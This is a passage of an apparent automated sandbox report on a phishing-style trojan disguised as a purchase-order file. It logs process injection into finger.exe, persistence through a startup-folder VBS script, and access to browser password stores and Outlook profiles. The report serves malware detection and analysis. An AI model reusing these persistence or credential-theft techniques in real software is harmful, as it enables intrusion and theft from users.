                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F3F0CC5_2_02F3F0CC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E9B1B05_2_02E9B1B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EC516C5_2_02EC516C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E7F1725_2_02E7F172
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F5B16B5_2_02F5B16B
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F416CC5_2_02F416CC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4F7B05_2_02F4F7B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E814605_2_02E81460
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4F43F5_2_02F4F43F
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F2D5B05_2_02F2D5B0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F475715_2_02F47571
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F3DAC65_2_02F3DAC6
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02ED5AA05_2_02ED5AA0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F31AA35_2_02F31AA3
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F2DAAC5_2_02F2DAAC
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F03A6C5_2_02F03A6C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F47A465_2_02F47A46
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FA495_2_02F4FA49
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F05BF05_2_02F05BF0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02ECDBF95_2_02ECDBF9
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EAFB805_2_02EAFB80
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FB765_2_02F4FB76
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E938E05_2_02E938E0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EFD8005_2_02EFD800
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E999505_2_02E99950
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EAB9505_2_02EAB950
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F259105_2_02F25910
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E99EB05_2_02E99EB0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FFB15_2_02F4FFB1
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E91F925_2_02E91F92
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FF095_2_02F4FF09
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F4FCF25_2_02F4FCF2
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F09C325_2_02F09C32
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02EAFDC05_2_02EAFDC0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F47D735_2_02F47D73
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02E93D405_2_02E93D40
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02F41D5A5_2_02F41D5A
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_003222305_2_00322230
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0033C1305_2_0033C130
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031D0A05_2_0031D0A0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_003111845_2_00311184
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031B2D05_2_0031B2D0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031D2C05_2_0031D2C0
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031B4205_2_0031B420
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_0031B41D5_2_0031B41D
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_003259005_2_00325900
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_00323B105_2_00323B10
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9E3545_2_02B9E354
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9E4735_2_02B9E473
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02BA546C5_2_02BA546C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9CB785_2_02B9CB78
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9D8D85_2_02B9D8D8
                      Source: C:\Windows\SysWOW64\finger.exeCode function: 5_2_02B9E80C5_2_02B9E80C
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02ED7E54 appears 102 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02E7B970 appears 280 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02F0F290 appears 105 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02EFEA12 appears 86 times
                      Source: C:\Windows\SysWOW64\finger.exeCode function: String function: 02EC5130 appears 58 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 0176B970 appears 280 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 017C7E54 appears 102 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 017FF290 appears 105 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 017B5130 appears 58 times
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeCode function: String function: 017EEA12 appears 86 times
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034365516.0000000000C6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs P.Order request for quotations.exe
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.Win32.TaskScheduler.dll\ vs P.Order request for quotations.exe
                      Source: P.Order request for quotations.exe, 00000000.00000002.1048429957.0000000006640000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameprotobuf-net.dllJ vs P.Order request for quotations.exe
                      Source: P.Order request for quotations.exe, 00000000.00000002.1034894237.0000000002A9F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs P.Order request for quotations.exe
                      Source: P.Order request for quotations.exe, 00000000.00000002.1045676915.00000000057C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameBdkvqnmzb.dll" vs P.Order request for quotations.exe
                      Source: P.Order request for quotations.exe, 00000002.00000002.1161227472.000000000186D000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs P.Order request for quotations.exe
                      Source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefinger.exej% vs P.Order request for quotations.exe
                      Source: P.Order request for quotations.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                      Source: P.Order request for quotations.exe, StateMatcher.csCryptographic APIs: 'CreateDecryptor'
                      Source: HashSize.exe.0.dr, StateMatcher.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.P.Order request for quotations.exe.3cf3fd0.1.raw.unpack, StateMatcher.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, Task.csTask registration methods: 'RegisterChanges', 'CreateTask'
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskService.csTask registration methods: 'CreateFromToken'
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, ITaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask'
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskFolder.csTask registration methods: 'RegisterTaskDefinition', 'RegisterTask', 'CreateFolder'
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, User.csSecurity API names: System.Security.Principal.SecurityIdentifier.Translate(System.Type)
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskPrincipal.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskFolder.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskFolder.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 7.2.HashSize.exe.3a34c10.5.raw.unpack, Task.csSecurity API names: Microsoft.Win32.TaskScheduler.Task.GetAccessControl(System.Security.AccessControl.AccessControlSections)
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskSecurity.csSecurity API names: Microsoft.Win32.TaskScheduler.TaskSecurity.GetAccessControlSectionsFromChanges()
                      Source: 0.2.P.Order request for quotations.exe.66b0000.6.raw.unpack, TaskSecurity.csSecurity API names: System.Security.AccessControl.CommonObjectSecurity.AddAccessRule(System.Security.AccessControl.AccessRule)
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@12/4@17/10
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbsJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeMutant created: NULL
                      Source: C:\Windows\SysWOW64\finger.exeFile created: C:\Users\user\AppData\Local\Temp\4ub-1K1QxnJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs"
                      Source: P.Order request for quotations.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: P.Order request for quotations.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: finger.exe, 00000005.00000003.1350891777.000000000291D000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1348296126.0000000002913000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3359394622.0000000002913000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3359394622.0000000002942000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: P.Order request for quotations.exeVirustotal: Detection: 36%
                      Source: P.Order request for quotations.exeReversingLabs: Detection: 26%
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeFile read: C:\Users\user\Desktop\P.Order request for quotations.exeJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\P.Order request for quotations.exe "C:\Users\user\Desktop\P.Order request for quotations.exe"
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess created: C:\Users\user\Desktop\P.Order request for quotations.exe "C:\Users\user\Desktop\P.Order request for quotations.exe"
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HashSize.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"
                      Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeProcess created: C:\Users\user\Desktop\P.Order request for quotations.exe "C:\Users\user\Desktop\P.Order request for quotations.exe"Jump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeProcess created: C:\Windows\SysWOW64\finger.exe "C:\Windows\SysWOW64\finger.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeProcess created: C:\Users\user\AppData\Roaming\HashSize.exe "C:\Users\user\AppData\Roaming\HashSize.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\wgFXHkCxLqErRnVrcKhbZqEVsNCcahoEisRCUNoTdNDZfRBGCqwfywDAE\Q1o6bM9jrUC5ov0.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\HashSize.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: C:\Users\user\Desktop\P.Order request for quotations.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\finger.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: P.Order request for quotations.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: P.Order request for quotations.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: finger.pdb source: P.Order request for quotations.exe, 00000002.00000002.1160887135.0000000001218000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: P.Order request for quotations.exe, 00000002.00000002.1161227472.0000000001740000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1169662969.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1160903868.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: P.Order request for quotations.exe, 00000000.00000002.1048657494.00000000066B0000.00000004.08000000.00040000.00000000.sdmp, HashSize.exe, 00000007.00000002.1316719764.00000000039A0000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: P.Order request for quotations.exe, P.Order request for quotations.exe, 00000002.00000002.1161227472.0000000001740000.00000040.00001000.00020000.00000000.sdmp, finger.exe, finger.exe, 00000005.00000002.3362238359.0000000002FEE000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000002.3362238359.0000000002E50000.00000040.00001000.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1169662969.0000000002CA0000.00000004.00000020.00020000.00000000.sdmp, finger.exe, 00000005.00000003.1160903868.0000000002AFE000.00000004.00000020.00020000.00000000.sdmp
